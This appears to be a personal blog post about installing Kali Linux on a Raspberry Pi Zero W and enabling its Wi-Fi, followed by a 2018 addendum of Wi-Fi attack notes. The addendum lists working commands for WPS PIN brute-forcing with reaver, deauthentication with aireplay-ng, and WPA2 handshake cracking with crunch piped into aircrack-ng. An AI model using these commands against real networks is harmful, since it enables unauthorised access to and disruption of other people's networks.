Sep 18, 2017

raspi0w + kali linux + how to enable wi-fi card

raspberry pi 用のkali linuxダウンロードサイト

以下、built-in wi-fi device (wlan0)が認識されなかった時の、対応手順

1)i installed kali on the sd card.

2)put the sd card in another pi using a usb to microsd adapter
 別の起動済みraspbian(pi)環境に SDカードを挿入

3)Then mount the 2 partitons from the card under /mnt and /mnt/boot
 mount /dev/sda2 /mnt/
 mount /dev/sda1 /mnt/boot/

4)rpi-update the kali image
 ROOT_PATH=/mnt BOOT_PATH=/mnt/boot rpi-update

5)change root to the kali image
 chroot /mnt/ /bin/bash

6)update the thing
 apt-get update
 apt-get upgrade

7)install the wireless driver
 apt-get install firmware-brcm80211

 ※ 手元の環境で「404  Not Found」エラーだが、

8)copy /lib/firmware/brcm/brcmfmac43430-sdio.txt from a rasbian image to /lib/firmware/brcm/brcmfmac43430-sdio.txt on kali

9)edit /etc/network/interfaces
 auto wlan0
 iface wlan0 inet dhcp
 wpa-ssid "mysupercoolssidofdoom"
 wpa-psk "mysupercoolpasswordofdoom"

10)exit the chroot, umount the partitons and eject the card

「That will get you kali on the pi zero w with wireless networking. But i cannot get bluetooth to work, and i soooooooo want to use my bluetooth keyboard with it. Sorry about my formatting typing this on my phone.」


・Re: Kali Linux Raspberry Pi Zero W - bluetooth (03/18)

・How To Set Up Kali Linux on the New $10 Raspberry Pi Zero W (07/22)

・Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W (09/01)

-- 2018.05.01 追記 -->

Kali Tutorials


5 Steps Wi-Fi

2.airmon-ng stop wlan0
3.airodump-ng    wlan0

| BSSID (Basic Service Set Identification): the MAC address of access point
| Beacons: Number of announcements packets sent by the AP
| #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
| #/s: Number of data packets per second measure over the last 10 seconds.
| MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
| CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
| ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4.wash -i wlan0 -c "target channel" -C -s
  if the WPS Locked status is No, then we are ready to move to step 5.
5.reaver -i wlan0 -b "target mac" --fail-wait=360

breaking wpa2-psk (2016/02/21)

airodump-ng wlan0 --bssid "target mac" --channel "target channel" -w "target ap"

aireplay-ng --deauth 20 -a "target mac" wlan0: aireplay-ng --deauth 20 -a "target mac" wlan0

crunch 20 20 0123456789abcdefghijklmnopqrstuvwxyz | aircrack-ng -b "target mac" -x1 -y -w - "target ap".cap

WPA2 Brute Force
> ./crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t passw@@@| aircrack-ng -b  And Target BSSID

Aircrack can't take dictionary from stdin?
> echo mywpapassword | aircrack-ng -w - -e devnetwork /tmp/captures.cap

HowTo : Pause/Resume Aircrack-ng

where files are saved in the session? #234 (2015/03/29)
> /usr/local/etc/reaver/ or /etc/reaver/

reaver resume from certain pin nr. #233 (2015/03/29)

No comments: